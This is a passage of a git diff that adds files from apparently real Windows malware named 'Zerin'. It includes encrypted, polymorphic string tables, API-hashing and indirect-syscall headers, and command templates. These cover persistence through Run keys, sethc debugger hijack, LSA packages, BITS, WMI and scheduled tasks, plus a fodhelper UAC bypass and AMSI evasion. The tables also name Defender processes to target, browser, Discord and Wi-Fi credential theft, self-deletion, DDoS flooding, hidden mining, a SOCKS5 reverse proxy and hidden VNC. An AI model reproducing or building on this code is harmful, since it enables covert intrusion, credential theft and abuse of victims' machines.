HANDLE ProcessHandle,
|
||||
PVOID *BaseAddress,
|
||||
PSIZE_T RegionSize,
|
||||
ULONG FreeType
|
||||
);
|
||||
|
||||
#endif // _WIN32
|
||||
#endif // ZERIN_INDIRECT_SYSCALLS_H
|
||||
Executable
+155
@@ -0,0 +1,155 @@
|
||||
# Obfuscated string definitions — one ID, "string" per line
|
||||
# Lines starting with # are comments. Blank lines are ignored.
|
||||
# Generated code uses ChaCha20 encryption with a random key per build.
|
||||
|
||||
OBF_ZERIN_UPDATE, "ZerinUpdate"
|
||||
OBF_ZERIN_SVC, "ZerinSvc"
|
||||
OBF_ZERIN_MAINTENANCE, "ZerinMaintenance"
|
||||
OBF_ZERIN_TRANSFER, "ZerinTransfer"
|
||||
OBF_ZERIN_WMI, "ZerinWMI"
|
||||
OBF_ZERIN_PORT, "ZerinPort"
|
||||
OBF_ZERIN_UPDATE_EXE, "ZerinUpdate.exe"
|
||||
OBF_ZERIN_EXE, "zerin.exe"
|
||||
OBF_RUN_KEY_PATH, "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
|
||||
OBF_SESSION_KEY_PATH, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo"
|
||||
OBF_ENVIRONMENT, "Environment"
|
||||
OBF_DESKTOP_PATH, "Control Panel\\Desktop"
|
||||
OBF_SCRNSAVE, "SCRNSAVE.EXE"
|
||||
OBF_LOGON_SCRIPT, "UserInitMprLogonScript"
|
||||
OBF_MAINTENANCE_VAL, "Maintenance"
|
||||
OBF_SETHC_IFEO, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe"
|
||||
OBF_PRINT_MONITORS, "SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors"
|
||||
OBF_LSA_PATH, "SYSTEM\\CurrentControlSet\\Control\\Lsa"
|
||||
OBF_SECURITY_PACKAGES, "Security Packages"
|
||||
OBF_COM_CLSID_PATH, "Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feab6b5}\\InProcServer32"
|
||||
OBF_SHM_NAME, "Local\\ZerinRkShm"
|
||||
OBF_EVT_NAME, "Local\\ZerinRkEvt"
|
||||
OBF_SERVICES_PATH, "SYSTEM\\CurrentControlSet\\Services"
|
||||
OBF_DEBUGGER, "Debugger"
|
||||
OBF_DRIVER, "Driver"
|
||||
OBF_THREADING_MODEL, "ThreadingModel"
|
||||
OBF_SCREEN_SAVE_ACTIVE, "ScreenSaveActive"
|
||||
OBF_SCREEN_SAVE_TIMEOUT, "ScreenSaveTimeOut"
|
||||
OBF_ZERIN_DISPLAY, "Zerin Maintenance Service"
|
||||
OBF_CMD_EXE, "cmd.exe"
|
||||
OBF_NTDLL, "ntdll.dll"
|
||||
OBF_KERNEL32, "kernel32.dll"
|
||||
OBF_ADVAPI32, "advapi32.dll"
|
||||
OBF_WINHTTP, "winhttp.dll"
|
||||
OBF_POWERSHELL, "powershell.exe"
|
||||
OBF_PERSIST_MUTEX, "Local\\ZerinPersistMtx"
|
||||
OBF_MS_SETTINGS_CMD, "Software\\Classes\\ms-settings\\shell\\open\\command"
|
||||
OBF_DELEGATE_EXECUTE, "DelegateExecute"
|
||||
OBF_NETAPI32, "netapi32.dll"
|
||||
OBF_AMSI, "amsi.dll"
|
||||
|
||||
# ── AV / Defender process names ──────────────────────────────────────
|
||||
OBF_MSMPENG, "MsMpEng.exe"
|
||||
OBF_MPCMDRUN, "MpCmdRun.exe"
|
||||
OBF_MSSENSE, "MsSense.exe"
|
||||
OBF_SECHEALTH, "SecurityHealthService.exe"
|
||||
OBF_SGRMBROKER, "SgrmBroker.exe"
|
||||
|
||||
# ── Browser credential paths ────────────────────────────────────────
|
||||
OBF_CHROME_USERDATA, "Google\\Chrome\\User Data"
|
||||
OBF_EDGE_USERDATA, "Microsoft\\Edge\\User Data"
|
||||
OBF_BRAVE_USERDATA, "BraveSoftware\\Brave-Browser\\User Data"
|
||||
OBF_OPERA_USERDATA, "Opera Software\\Opera Stable"
|
||||
OBF_VIVALDI_USERDATA, "Vivaldi\\User Data"
|
||||
OBF_FIREFOX_REG, "SOFTWARE\\Mozilla\\Mozilla Firefox"
|
||||
OBF_FIREFOX_REGMAIN, "SOFTWARE\\Mozilla\\Mozilla Firefox\\%s\\Main"
|
||||
OBF_FIREFOX_X64, "C:\\Program Files\\Mozilla Firefox"
|
||||
OBF_FIREFOX_X86, "C:\\Program Files (x86)\\Mozilla Firefox"
|
||||
|
||||
# ── DLL names ────────────────────────────────────────────────────────
|
||||
OBF_VERSION_DLL, "version.dll"
|
||||
OBF_DXGI_DLL, "dxgi.dll"
|
||||
OBF_D3D11_DLL, "d3d11.dll"
|
||||
OBF_RSTRTMGR_DLL, "rstrtmgr.dll"
|
||||
|
||||
# ── Command strings ─────────────────────────────────────────────────
|
||||
OBF_WMIC_AV, "cmd.exe /c wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName /format:list"
|
||||
OBF_NETSH_PROFILES, "netsh wlan show profiles"
|
||||
OBF_NETSH_PROFILE_KEY, "netsh wlan show profile name=\"%s\" key=clear"
|
||||
OBF_IPCONFIG_FLUSH, "cmd.exe /c ipconfig /flushdns"
|
||||
OBF_SELF_DELETE, "cmd.exe /c ping 127.0.0.1 -n 3 > nul & del /f /q \"%s\""
|
||||
|
||||
# ── Registry paths ───────────────────────────────────────────────────
|
||||
OBF_REG_CRYPTOGRAPHY, "SOFTWARE\\Microsoft\\Cryptography"
|
||||
OBF_REG_PUTTY, "SOFTWARE\\SimonTatham\\PuTTY\\Sessions"
|
||||
OBF_REG_CPU, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0"
|
||||
|
||||
# ── System paths ─────────────────────────────────────────────────────
|
||||
OBF_NTDLL_PATH, "C:\\Windows\\System32\\ntdll.dll"
|
||||
OBF_HOSTS_PATH, "C:\\Windows\\System32\\drivers\\etc\\hosts"
|
||||
OBF_SETHC_EXE, "sethc.exe"
|
||||
OBF_FODHELPER_EXE, "fodhelper.exe"
|
||||
|
||||
# ── Branding / class names ───────────────────────────────────────────
|
||||
OBF_CLIPMON_CLASS, "ZerinClipMon"
|
||||
OBF_BLACK_CLASS, "ZerinBlack"
|
||||
OBF_WEBCAM_CLASS, "ZerinWebcam"
|
||||
|
||||
# ── Discord paths ────────────────────────────────────────────────────
|
||||
OBF_DISCORD_LDB, "discord\\Local Storage\\leveldb"
|
||||
OBF_DISCORD_CANARY_LDB, "discordcanary\\Local Storage\\leveldb"
|
||||
OBF_DISCORD_PTB_LDB, "discordptb\\Local Storage\\leveldb"
|
||||
|
||||
# ── Browser exe paths (for VNC) ──────────────────────────────────────
|
||||
OBF_BRAVE_EXE_PATH, "BraveSoftware\\Brave-Browser\\Application\\brave.exe"
|
||||
OBF_CHROME_EXE_PATH, "Google\\Chrome\\Application\\chrome.exe"
|
||||
OBF_EDGE_EXE_PATH, "Microsoft\\Edge\\Application\\msedge.exe"
|
||||
OBF_FIREFOX_EXE_PATH, "Mozilla Firefox\\firefox.exe"
|
||||
|
||||
# ── PowerShell / persistence command templates ──────────────────────
|
||||
OBF_PS_PREFIX, "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command "
|
||||
OBF_PS_HIDDEN_PREFIX, "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command "
|
||||
OBF_SCHTASKS_FMT, "schtasks /Create /TN \"%s\" /TR \"\\\"%s\\\"\" /SC MINUTE /MO %s /F"
|
||||
OBF_BITS_CHAIN_FMT, "cmd.exe /c bitsadmin /create \"%s\" && bitsadmin /addfile \"%s\" \"https://localhost/noexist\" \"%%TEMP%%\\zerin_bits.tmp\" && bitsadmin /SetNotifyCmdLine \"%s\" \"%s\" NUL && bitsadmin /SetMinRetryDelay \"%s\" 60 && bitsadmin /SetNoProgressTimeout \"%s\" 2592000 && bitsadmin /resume \"%s\""
|
||||
OBF_WMI_PS_FMT, "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command \""
|
||||
|
||||
# ── AMSI / injection ───────────────────────────────────────────────
|
||||
OBF_AMSI_OPEN_SESSION, "AmsiOpenSession"
|
||||
OBF_REFLECTIVE_DLL_MAIN, "ReflectiveDllMain"
|
||||
|
||||
# ── Elevation moniker ─────────────────────────────────────────────
|
||||
OBF_ELEVATION_MONIKER, "Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
|
||||
|
||||
# ── DDoS status strings ───────────────────────────────────────────
|
||||
OBF_DDOS_STARTED_FMT, "DDoS flood started: %s %s | %d threads | %d seconds"
|
||||
OBF_DDOS_ALREADY, "DDoS flood already running. Stop it first."
|
||||
OBF_DDOS_STOPPED_FMT, "DDoS flood stopped. Duration: %lus | Requests: %ld | Errors: %ld | Avg: %.0f req/s"
|
||||
OBF_DDOS_NOT_RUNNING, "No DDoS flood is running"
|
||||
|
||||
# ── Miner status strings ──────────────────────────────────────────
|
||||
OBF_MINER_STARTED_FMT, "Miner started (PID %lu) | Pool: %s | CPU: %d%% | API port: %d"
|
||||
OBF_MINER_ALREADY, "Miner already running. Stop it first."
|
||||
OBF_MINER_STOPPED_FMT, "Miner stopped (PID %lu)"
|
||||
OBF_MINER_NOT_RUNNING, "No miner is running"
|
||||
OBF_MINER_DIR, "Microsoft\\Runtime"
|
||||
OBF_MINER_EXE, "svcruntime.exe"
|
||||
|
||||
# ── SOCKS5 status strings ─────────────────────────────────────────
|
||||
OBF_SOCKS5_STARTED, "SOCKS5 reverse proxy started"
|
||||
OBF_SOCKS5_STOPPED, "SOCKS5 reverse proxy stopped"
|
||||
OBF_SOCKS5_NOT_RUNNING, "SOCKS5 was not running"
|
||||
|
||||
# ── UAC cleanup paths ─────────────────────────────────────────────
|
||||
OBF_MS_SETTINGS_OPEN, "Software\\Classes\\ms-settings\\shell\\open"
|
||||
OBF_MS_SETTINGS_SHELL, "Software\\Classes\\ms-settings\\shell"
|
||||
OBF_MS_SETTINGS_ROOT, "Software\\Classes\\ms-settings"
|
||||
|
||||
# ── hVNC / VNC status strings ──────────────────────────────────────
|
||||
OBF_HVNC_STARTED, "hVNC streaming started (hidden desktop created)"
|
||||
OBF_HVNC_STOPPED, "hVNC stopped (hidden desktop destroyed)"
|
||||
OBF_HVNC_NOT_RUNNING, "hVNC was not running"
|
||||
OBF_HVNC_NOT_ACTIVE, "hVNC session is not active"
|
||||
|
||||
# ── Persistence cleanup (uninstall) ───────────────────────────────
|
||||
OBF_SCHTASKS_DELETE_FMT, "schtasks /Delete /TN \"%s\" /F"
|
||||
OBF_BITSADMIN_CANCEL_FMT, "bitsadmin /cancel \"%s\""
|
||||
OBF_PS_WMIDELETE_FMT, "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Get-WmiObject -Namespace root\\subscription -Class __EventFilter | Where-Object { $_.Name -eq '%s' } | Remove-WmiObject; Get-WmiObject -Namespace root\\subscription -Class CommandLineEventConsumer | Where-Object { $_.Name -eq '%s' } | Remove-WmiObject\""
|
||||
|
||||
# ── PowerShell encoded command formats ─────────────────────────────
|
||||
OBF_PS_ENCODED_HIDDEN, "powershell -NoProfile -WindowStyle Hidden -EncodedCommand %s"
|
||||
OBF_PS_ENCODED, "powershell -NoProfile -EncodedCommand %s"
|
||||
Executable
+132
@@ -0,0 +1,132 @@
|
||||
// Auto-generated by generate_strings.py - DO NOT EDIT
|
||||
// Regenerated with random key on every build for polymorphic output.
|
||||
#ifndef OBF_STRINGS_GEN_H
|
||||
#define OBF_STRINGS_GEN_H
|
||||
|
||||
#include <stddef.h>
|
||||
|
||||
// String IDs
|
||||
enum {
|
||||
OBF_ZERIN_UPDATE = 0, // "Atow1LUpdate" (12 bytes)
|
||||
OBF_ZERIN_SVC = 1, // "Atow1LSvc" (9 bytes)
|
||||
OBF_ZERIN_MAINTENANCE = 2, // "Atow1LMaintenance" (17 bytes)
|
||||
OBF_ZERIN_TRANSFER = 3, // "Atow1LTransfer" (14 bytes)
|
||||
OBF_ZERIN_WMI = 4, // "Atow1LWMI" (9 bytes)
|
||||
OBF_ZERIN_PORT = 5, // "Atow1LPort" (10 bytes)
|
||||
OBF_ZERIN_UPDATE_EXE = 6, // "Atow1LUpdate.exe" (16 bytes)
|
||||
OBF_ZERIN_EXE = 7, // "atow1L.exe" (10 bytes)
|
||||
OBF_RUN_KEY_PATH = 8, // "Software\\Microsoft\\Windows\\CurrentVersion\\Run" (45 bytes)
|
||||
OBF_SESSION_KEY_PATH = 9, // "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo" (62 bytes)
|
||||
OBF_ENVIRONMENT = 10, // "Environment" (11 bytes)
|
||||
OBF_DESKTOP_PATH = 11, // "Control Panel\\Desktop" (21 bytes)
|
||||
OBF_SCRNSAVE = 12, // "SCRNSAVE.EXE" (12 bytes)
|
||||
OBF_LOGON_SCRIPT = 13, // "UserInitMprLogonScript" (22 bytes)
|
||||
OBF_MAINTENANCE_VAL = 14, // "Maintenance" (11 bytes)
|
||||
OBF_SETHC_IFEO = 15, // "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe" (83 bytes)
|
||||
OBF_PRINT_MONITORS = 16, // "SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors" (47 bytes)
|
||||
OBF_LSA_PATH = 17, // "SYSTEM\\CurrentControlSet\\Control\\Lsa" (36 bytes)
|
||||
OBF_SECURITY_PACKAGES = 18, // "Security Packages" (17 bytes)
|
||||
OBF_COM_CLSID_PATH = 19, // "Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feab6b5}\\InProcServer32" (76 bytes)
|
||||
OBF_SHM_NAME = 20, // "Local\\Atow1LRkShm" (17 bytes)
|
||||
OBF_EVT_NAME = 21, // "Local\\Atow1LRkEvt" (17 bytes)
|
||||
OBF_SERVICES_PATH = 22, // "SYSTEM\\CurrentControlSet\\Services" (33 bytes)
|
||||
OBF_DEBUGGER = 23, // "Debugger" (8 bytes)
|
||||
OBF_DRIVER = 24, // "Driver" (6 bytes)
|
||||
OBF_THREADING_MODEL = 25, // "ThreadingModel" (14 bytes)
|
||||
OBF_SCREEN_SAVE_ACTIVE = 26, // "ScreenSaveActive" (16 bytes)
|
||||
OBF_SCREEN_SAVE_TIMEOUT = 27, // "ScreenSaveTimeOut" (17 bytes)
|
||||
OBF_ZERIN_DISPLAY = 28, // "Atow1L Maintenance Service" (26 bytes)
|
||||
OBF_CMD_EXE = 29, // "cmd.exe" (7 bytes)
|
||||
OBF_NTDLL = 30, // "ntdll.dll" (9 bytes)
|
||||
OBF_KERNEL32 = 31, // "kernel32.dll" (12 bytes)
|
||||
OBF_ADVAPI32 = 32, // "advapi32.dll" (12 bytes)
|
||||
OBF_WINHTTP = 33, // "winhttp.dll" (11 bytes)
|
||||
OBF_POWERSHELL = 34, // "powershell.exe" (14 bytes)
|
||||
OBF_PERSIST_MUTEX = 35, // "Local\\Atow1LPersistMtx" (22 bytes)
|
||||
OBF_MS_SETTINGS_CMD = 36, // "Software\\Classes\\ms-settings\\shell\\open\\command" (47 bytes)
|
||||
OBF_DELEGATE_EXECUTE = 37, // "DelegateExecute" (15 bytes)
|
||||
OBF_NETAPI32 = 38, // "netapi32.dll" (12 bytes)
|
||||
OBF_AMSI = 39, // "amsi.dll" (8 bytes)
|
||||
OBF_MSMPENG = 40, // "MsMpEng.exe" (11 bytes)
|
||||
OBF_MPCMDRUN = 41, // "MpCmdRun.exe" (12 bytes)
|
||||
OBF_MSSENSE = 42, // "MsSense.exe" (11 bytes)
|
||||
OBF_SECHEALTH = 43, // "SecurityHealthService.exe" (25 bytes)
|
||||
OBF_SGRMBROKER = 44, // "SgrmBroker.exe" (14 bytes)
|
||||
OBF_CHROME_USERDATA = 45, // "Google\\Chrome\\User Data" (23 bytes)
|
||||
OBF_EDGE_USERDATA = 46, // "Microsoft\\Edge\\User Data" (24 bytes)
|
||||
OBF_BRAVE_USERDATA = 47, // "BraveSoftware\\Brave-Browser\\User Data" (37 bytes)
|
||||
OBF_OPERA_USERDATA = 48, // "Opera Software\\Opera Stable" (27 bytes)
|
||||
OBF_VIVALDI_USERDATA = 49, // "Vivaldi\\User Data" (17 bytes)
|
||||
OBF_FIREFOX_REG = 50, // "SOFTWARE\\Mozilla\\Mozilla Firefox" (32 bytes)
|
||||
OBF_FIREFOX_REGMAIN = 51, // "SOFTWARE\\Mozilla\\Mozilla Firefox\\%s\\Main" (40 bytes)
|
||||
OBF_FIREFOX_X64 = 52, // "C:\\Program Files\\Mozilla Firefox" (32 bytes)
|
||||
OBF_FIREFOX_X86 = 53, // "C:\\Program Files (x86)\\Mozilla Firefox" (38 bytes)
|
||||
OBF_VERSION_DLL = 54, // "version.dll" (11 bytes)
|
||||
OBF_DXGI_DLL = 55, // "dxgi.dll" (8 bytes)
|
||||
OBF_D3D11_DLL = 56, // "d3d11.dll" (9 bytes)
|
||||
OBF_RSTRTMGR_DLL = 57, // "rstrtmgr.dll" (12 bytes)
|
||||
OBF_WMIC_AV = 58, // "cmd.exe /c wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName /format:list" (100 bytes)
|
||||
OBF_NETSH_PROFILES = 59, // "netsh wlan show profiles" (24 bytes)
|
||||
OBF_NETSH_PROFILE_KEY = 60, // "netsh wlan show profile name=\\\"%s\\\" key=clear" (45 bytes)
|
||||
OBF_IPCONFIG_FLUSH = 61, // "cmd.exe /c ipconfig /flushdns" (29 bytes)
|
||||
OBF_SELF_DELETE = 62, // "cmd.exe /c ping 127.0.0.1 -n 3 > nul & del /f /q \\\"%s\\\"" (55 bytes)
|
||||
OBF_REG_CRYPTOGRAPHY = 63, // "SOFTWARE\\Microsoft\\Cryptography" (31 bytes)
|
||||
OBF_REG_PUTTY = 64, // "SOFTWARE\\SimonTatham\\PuTTY\\Sessions" (35 bytes)
|
||||
OBF_REG_CPU = 65, // "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0" (46 bytes)
|
||||
OBF_NTDLL_PATH = 66, // "C:\\Windows\\System32\\ntdll.dll" (29 bytes)
|
||||
OBF_HOSTS_PATH = 67, // "C:\\Windows\\System32\\drivers\\etc\\hosts" (37 bytes)
|
||||
OBF_SETHC_EXE = 68, // "sethc.exe" (9 bytes)
|
||||
OBF_FODHELPER_EXE = 69, // "fodhelper.exe" (13 bytes)
|
||||
OBF_CLIPMON_CLASS = 70, // "Atow1LClipMon" (13 bytes)
|
||||
OBF_BLACK_CLASS = 71, // "Atow1LBlack" (11 bytes)
|
||||
OBF_WEBCAM_CLASS = 72, // "Atow1LWebcam" (12 bytes)
|
||||
OBF_DISCORD_LDB = 73, // "discord\\Local Storage\\leveldb" (29 bytes)
|
||||
OBF_DISCORD_CANARY_LDB = 74, // "discordcanary\\Local Storage\\leveldb" (35 bytes)
|
||||
OBF_DISCORD_PTB_LDB = 75, // "discordptb\\Local Storage\\leveldb" (32 bytes)
|
||||
OBF_BRAVE_EXE_PATH = 76, // "BraveSoftware\\Brave-Browser\\Application\\brave.exe" (49 bytes)
|
||||
OBF_CHROME_EXE_PATH = 77, // "Google\\Chrome\\Application\\chrome.exe" (36 bytes)
|
||||
OBF_EDGE_EXE_PATH = 78, // "Microsoft\\Edge\\Application\\msedge.exe" (37 bytes)
|
||||
OBF_FIREFOX_EXE_PATH = 79, // "Mozilla Firefox\\firefox.exe" (27 bytes)
|
||||
OBF_PS_PREFIX = 80, // "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -Command " (75 bytes)
|
||||
OBF_PS_HIDDEN_PREFIX = 81, // "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command " (71 bytes)
|
||||
OBF_SCHTASKS_FMT = 82, // "schtasks /Create /TN \\\"%s\\\" /TR \\\"\\\\\"%s\\\\\"\\\" /SC MINUTE /MO %s /F" (65 bytes)
|
||||
OBF_BITS_CHAIN_FMT = 83, // "cmd.exe /c bitsadmin /create \\\"%s\\\" && bitsadmin /addfile \\\"%s\\\" \\\"https://localhost/noexist\\\" \\\"%%TEMP%%\\atow1L_bits.tmp\\\" && bitsadmin /SetNotifyCmdLine \\\"%s\\\" \\\"%s\\\" NUL && bitsadmin /SetMinRetryDelay \\\"%s\\\" 60 && bitsadmin /SetNoProgressTimeout \\\"%s\\\" 2592000 && bitsadmin /resume \\\"%s\\\"" (291 bytes)
|
||||
OBF_WMI_PS_FMT = 84, // "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command \\\"" (73 bytes)
|
||||
OBF_AMSI_OPEN_SESSION = 85, // "AmsiOpenSession" (15 bytes)
|
||||
OBF_REFLECTIVE_DLL_MAIN = 86, // "ReflectiveDllMain" (17 bytes)
|
||||
OBF_ELEVATION_MONIKER = 87, // "Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" (66 bytes)
|
||||
OBF_DDOS_STARTED_FMT = 88, // "DDoS flood started: %s %s | %d threads | %d seconds" (51 bytes)
|
||||
OBF_DDOS_ALREADY = 89, // "DDoS flood already running. Stop it first." (42 bytes)
|
||||
OBF_DDOS_STOPPED_FMT = 90, // "DDoS flood stopped. Duration: %lus | Requests: %ld | Errors: %ld | Avg: %.0f req/s" (82 bytes)
|
||||
OBF_DDOS_NOT_RUNNING = 91, // "No DDoS flood is running" (24 bytes)
|
||||
OBF_MINER_STARTED_FMT = 92, // "Miner started (PID %lu) | Pool: %s | CPU: %d%% | API port: %d" (61 bytes)
|
||||
OBF_MINER_ALREADY = 93, // "Miner already running. Stop it first." (37 bytes)
|
||||
OBF_MINER_STOPPED_FMT = 94, // "Miner stopped (PID %lu)" (23 bytes)
|
||||
OBF_MINER_NOT_RUNNING = 95, // "No miner is running" (19 bytes)
|
||||
OBF_MINER_DIR = 96, // "Microsoft\\Runtime" (17 bytes)
|
||||
OBF_MINER_EXE = 97, // "svcruntime.exe" (14 bytes)
|
||||
OBF_SOCKS5_STARTED = 98, // "SOCKS5 reverse proxy started" (28 bytes)
|
||||
OBF_SOCKS5_STOPPED = 99, // "SOCKS5 reverse proxy stopped" (28 bytes)
|
||||
OBF_SOCKS5_NOT_RUNNING = 100, // "SOCKS5 was not running" (22 bytes)
|
||||
OBF_MS_SETTINGS_OPEN = 101, // "Software\\Classes\\ms-settings\\shell\\open" (39 bytes)
|
||||
OBF_MS_SETTINGS_SHELL = 102, // "Software\\Classes\\ms-settings\\shell" (34 bytes)
|
||||
OBF_MS_SETTINGS_ROOT = 103, // "Software\\Classes\\ms-settings" (28 bytes)
|
||||
OBF_HVNC_STARTED = 104, // "hVNC streaming started (hidden desktop created)" (47 bytes)
|
||||
OBF_HVNC_STOPPED = 105, // "hVNC stopped (hidden desktop destroyed)" (39 bytes)
|
||||
OBF_HVNC_NOT_RUNNING = 106, // "hVNC was not running" (20 bytes)
|
||||
OBF_HVNC_NOT_ACTIVE = 107, // "hVNC session is not active" (26 bytes)
|
||||
OBF_SCHTASKS_DELETE_FMT = 108, // "schtasks /Delete /TN \\\"%s\\\" /F" (30 bytes)
|
||||
OBF_BITSADMIN_CANCEL_FMT = 109, // "bitsadmin /cancel \\\"%s\\\"" (24 bytes)
|
||||
OBF_PS_WMIDELETE_FMT = 110, // "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command \\\"Get-WmiObject -Namespace root\\subscription -Class __EventFilter | Where-Object { $_.Name -eq '%s' } | Remove-WmiObject; Get-WmiObject -Namespace root\\subscription -Class CommandLineEventConsumer | Where-Object { $_.Name -eq '%s' } | Remove-WmiObject\\\"" (324 bytes)
|
||||
OBF_PS_ENCODED_HIDDEN = 111, // "powershell -NoProfile -WindowStyle Hidden -EncodedCommand %s" (60 bytes)
|
||||
OBF_PS_ENCODED = 112, // "powershell -NoProfile -EncodedCommand %s" (40 bytes)
|
||||
OBF_STRING_COUNT = 113
|
||||
};
|
||||
|
||||
// Decrypt string into caller-provided buffer. Returns buf, or NULL on error.
|
||||
char *obf_decrypt_to(int id, char *buf, size_t buf_size);
|
||||
|
||||
// Wipe a decrypted buffer after use.
|
||||
void obf_wipe(char *buf, size_t len);
|
||||
|
||||
#endif // OBF_STRINGS_GEN_H
|
||||
Executable
+74
@@ -0,0 +1,74 @@
|
||||
#ifndef ZERIN_PLATFORM_H
|
||||
#define ZERIN_PLATFORM_H
|
||||
|
||||
#include <stdint.h>
|
||||
|
||||
#ifdef _WIN32
|
||||
#define WIN32_LEAN_AND_MEAN
|
||||
#include <windows.h>
|
||||
#include <winhttp.h>
|
||||
#include <tlhelp32.h>
|
||||
#include <bcrypt.h>
|
||||
#include <shlwapi.h>
|
||||
#include <iphlpapi.h>
|
||||
|
||||
#pragma comment(lib, "winhttp.lib")
|
||||
#pragma comment(lib, "advapi32.lib")
|
||||
#pragma comment(lib, "bcrypt.lib")
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
#pragma comment(lib, "shlwapi.lib")
|
||||
#pragma comment(lib, "iphlpapi.lib")
|
||||
|
||||
// NT status
|
||||
#ifndef STATUS_SUCCESS
|
||||
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
|
||||
#endif
|
||||
|
||||
// Token integrity levels (guard against redefinition from winnt.h)
|
||||
#ifndef SECURITY_MANDATORY_UNTRUSTED_RID
|
||||
#define SECURITY_MANDATORY_UNTRUSTED_RID 0x0000
|
||||
#endif
|
||||
#ifndef SECURITY_MANDATORY_LOW_RID
|
||||
#define SECURITY_MANDATORY_LOW_RID 0x1000
|
||||
#endif
|
||||
#ifndef SECURITY_MANDATORY_MEDIUM_RID
|
||||
#define SECURITY_MANDATORY_MEDIUM_RID 0x2000
|
||||
#endif
|
||||
#ifndef SECURITY_MANDATORY_HIGH_RID
|
||||
#define SECURITY_MANDATORY_HIGH_RID 0x3000
|
||||
#endif
|
||||
#ifndef SECURITY_MANDATORY_SYSTEM_RID
|
||||
#define SECURITY_MANDATORY_SYSTEM_RID 0x4000
|
||||
#endif
|
||||
|
||||
#else
|
||||
// Non-Windows includes
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#endif // _WIN32
|
||||
|
||||
// Cross-platform sleep (milliseconds)
|
||||
static inline void platform_sleep_ms(uint32_t ms) {
|
||||
#ifdef _WIN32
|
||||
Sleep(ms);
|
||||
#else
|
||||
usleep(ms * 1000);
|
||||
#endif
|
||||
}
|
||||
|
||||
// Get current time as Unix timestamp
|
||||
static inline int64_t platform_time_unix(void) {
|
||||
#ifdef _WIN32
|
||||
FILETIME ft;
|
||||
ULARGE_INTEGER uli;
|
||||
GetSystemTimeAsFileTime(&ft);
|
||||
uli.LowPart = ft.dwLowDateTime;
|
||||
uli.HighPart = ft.dwHighDateTime;
|
||||
// Convert from Windows epoch (1601) to Unix epoch (1970)
|
||||
return (int64_t)((uli.QuadPart - 116444736000000000ULL) / 10000000ULL);
|
||||
#else
|
||||
return (int64_t)time(NULL);
|
||||
#endif
|
||||
}
|
||||
|
||||
#endif // ZERIN_PLATFORM_H
|
||||
Executable
+8
@@ -0,0 +1,8 @@
|
||||
// Auto-generated by generate_polymorphic.py - DO NOT EDIT
|
||||
#ifndef POLY_CONFIG_H
|
||||
#define POLY_CONFIG_H
|
||||
|
||||
#define STR_KEY 0x8F
|
||||
#define POLY_BUILD_SEED 0xC96ACEA1u
|
||||
|
||||
#endif // POLY_CONFIG_H
|
||||
Executable
+57
@@ -0,0 +1,57 @@
|
||||
// Auto-generated by generate_polymorphic.py - DO NOT EDIT
|
||||
// Algorithm: DJB2(init=5419,mult=33)
|
||||
#ifndef POLY_HASH_H
|
||||
#define POLY_HASH_H
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stddef.h>
|
||||
|
||||
// Hash function for narrow (char*) API names
|
||||
static inline uint32_t hash_api(const char *name) {
|
||||
uint32_t h = 5419u;
|
||||
int c;
|
||||
while ((c = *name++) != 0)
|
||||
h = h * 33u + (uint32_t)c;
|
||||
return h;
|
||||
}
|
||||
|
||||
// Hash function for wide (wchar_t*) module names, lowercased
|
||||
static inline uint32_t hash_wide_lower(const wchar_t *name, size_t chars) {
|
||||
uint32_t h = 5419u;
|
||||
size_t i;
|
||||
for (i = 0; i < chars; i++) {
|
||||
wchar_t c = name[i];
|
||||
if (c == 0) break;
|
||||
if (c >= L'A' && c <= L'Z') c += 32;
|
||||
h = h * 33u + (uint32_t)c;
|
||||
}
|
||||
return h;
|
||||
}
|
||||
|
||||
// Pre-computed module name hashes (wide, lowercased)
|
||||
#define HASH_NTDLL 0xbc6540d3
|
||||
#define HASH_KERNEL32 0x385c579b
|
||||
#define HASH_ADVAPI32 0x2f3bf36f
|
||||
#define HASH_USER32 0x262ebb99
|
||||
|
||||
// Pre-computed function name hashes (narrow)
|
||||
#define HASH_NtAllocateVirtualMemory 0x1e3b68b2
|
||||
#define HASH_NtProtectVirtualMemory 0xc01ef36e
|
||||
#define HASH_NtWriteVirtualMemory 0x9de0d6b8
|
||||
#define HASH_NtCreateThreadEx 0x9763ad56
|
||||
#define HASH_NtClose 0x9d53aca3
|
||||
#define HASH_NtQueryInformationProcess 0xcf5b9348
|
||||
#define HASH_NtFreeVirtualMemory 0x94eb8a4f
|
||||
#define HASH_RtlGetVersion 0x082c3803
|
||||
#define HASH_NtQuerySystemInformation 0x79ebc5ce
|
||||
#define HASH_VirtualAllocEx 0x3008a55a
|
||||
#define HASH_WriteProcessMemory 0xaf8e166e
|
||||
#define HASH_VirtualProtectEx 0xa46a1e50
|
||||
#define HASH_VirtualFreeEx 0x1548e9f1
|
||||
#define HASH_OpenProcess 0xb556da3c
|
||||
#define HASH_VirtualAlloc 0x004778bd
|
||||
#define HASH_VirtualFree 0xaaafab94
|
||||
